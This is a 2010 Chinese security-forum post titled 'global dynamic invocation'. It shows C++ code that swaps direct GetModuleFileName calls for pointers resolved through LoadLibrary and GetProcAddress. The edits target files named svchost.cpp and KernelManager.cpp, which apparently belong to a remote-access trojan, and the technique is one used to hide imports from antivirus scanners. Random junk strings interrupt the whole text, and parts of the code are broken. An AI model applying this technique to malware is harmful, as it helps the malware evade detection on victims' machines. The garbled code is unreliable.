标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
# Z: Z; n% I }
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
% y* G# z2 k( ]" |, ?; q' e/ d
----------------------------------------
/ \" m0 N: r9 }& ]6 k- r3 C
DTDY.h:
5 M2 r- H; Y( h, K- z! x
" p' y8 k) u, M1 u/ _" N- a- Q
#if _MSC_VER>1000
/ G" z; R1 a% [' z- t
#pragma once
1 x7 S1 T* a& g5 P
#endif //_MSC_VER>1000
' _6 a: H- c* }- r6 S
#include<windows.h>
) D& |& j5 X4 U$ L. J" H: `! c) u
& z0 p2 w" s* j+ Y8 {3 @! T
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
& v! `; U. X* B5 \
class DTDY
3 j. l/ }2 G0 ~
{
0 p: y! W1 `) X9 i, E- A+ V) Y. q
public:
- f# q* g$ s' l! W( o/ Z
DTDY();
0 _6 ~1 c; d3 s" [: [9 p+ s! U
virtual ~DTDY();
% u, `, F ?- G
public:
) M c6 Y% O `( Q
static pGetModuleFileNameA MyGetModuleFileName;
" T+ e8 c, V4 c
static BOOL FunInitiallization();
: L N; R9 b* p
};
: ~% p7 q/ B+ |6 ?: `
#endif
9 C9 D( q/ n6 A! p; B
----------------------------------------
- |; [! ~ i; ]4 H
4 T; T, o5 P$ R& G
DTDY.cpp:
% F" h4 c2 d2 M+ n
: X6 R: j/ b0 X
#include "DTDY.h"
* M* V$ Q6 ~" t2 o9 }+ \
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
# r4 G0 w, F# a/ w4 h
DTDY:TDY()
% E" Q2 \" r. _" ^% C( i W
{
F) d* F& y# M4 w* k( o, ^
}
1 |* t$ v; O# w
DTDY::~DTDY()
' I5 ~7 t, X3 [ T& w& N! K9 S+ M7 m
{
! d1 x; {2 r9 e# \- H
}
3 Z; x* q/ _) ^9 W; [0 i% d4 @ N
BOOL DTDY::FunInitiallization()
' U2 J) w; p: y5 `$ h4 R
{
/ D- i5 P0 |" E7 l
HMODULE hModule=LoadLibrary("kernel32.dll");
Z' Y8 [: g( i3 Z! a
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
& H; D3 O+ T# m% C: c- ~
if(!MyGetModuleFileName=) return FALSE;
; V' B2 y1 s; b4 f7 i ]0 C: @- Z
6 b$ R2 I, K/ R, R
return TRUE;
2 E3 D$ Q* |& R1 K4 D/ r
}
" R8 P9 |+ |1 }9 B
----------------------------------------
2 M; ?) ^) D8 P! z% j: o
svchost.cpp:
, E& o# J- p* I8 B2 P5 W9 e) M
" y- N9 q" `9 [# b5 z3 j
#include "DTDY.h"
# ]$ O5 Q! ~& g7 ?! V/ P
" ] y' N* Q. l2 J, h
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
! z% y3 _8 W* r7 K
{
8 C% l- [* r+ w; m
switch(ul_reason_for_call)
) k% ^9 `2 a9 p$ G
{
9 e! y; S7 e! ^/ [% ?+ t# j# n! \; \
case DLL_PROCESS_ATTACH:
4 h) l8 c5 b3 B3 ^1 c: y9 ] {
if(!DTDY::FunInitiallization()) return FALSE;
+ h7 m5 V4 M- P) |6 N; l' w! X; K
3 i' l2 j6 p0 |" z; t
break;
( _8 \7 g/ b1 {% I+ {- z7 A
}
% o/ ?/ @; Y3 P. A3 l- [
}
& K7 C3 ?' x V; ~0 u4 l
4 `; s: T0 x: S; n3 g; E* o8 a% y+ E
! P6 B+ e9 r& R+ T# b
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
4 S# e# O: y9 R: h
改写为
, F( o; ?1 [. z) u' Z5 \9 g
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
1 o/ n4 @1 B1 ^% I4 ?1 a
----------------------------------------
! ]& }) W: d. r! z1 @, y" I' T
KernelManager.cpp:
4 r9 b: D2 p! f% ~2 I9 B! o
5 g9 n" f9 P/ A3 U6 A P; k- K
#include "../DTDY.h"
, G0 _# m& l# M! d9 T
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
5 f) [+ ^( v, K8 d6 p
改写为
+ J" I; E4 O4 M7 [' ]5 q: d1 y
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
) C4 Q" J/ ^1 v" E- J6 ~9 V# E
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
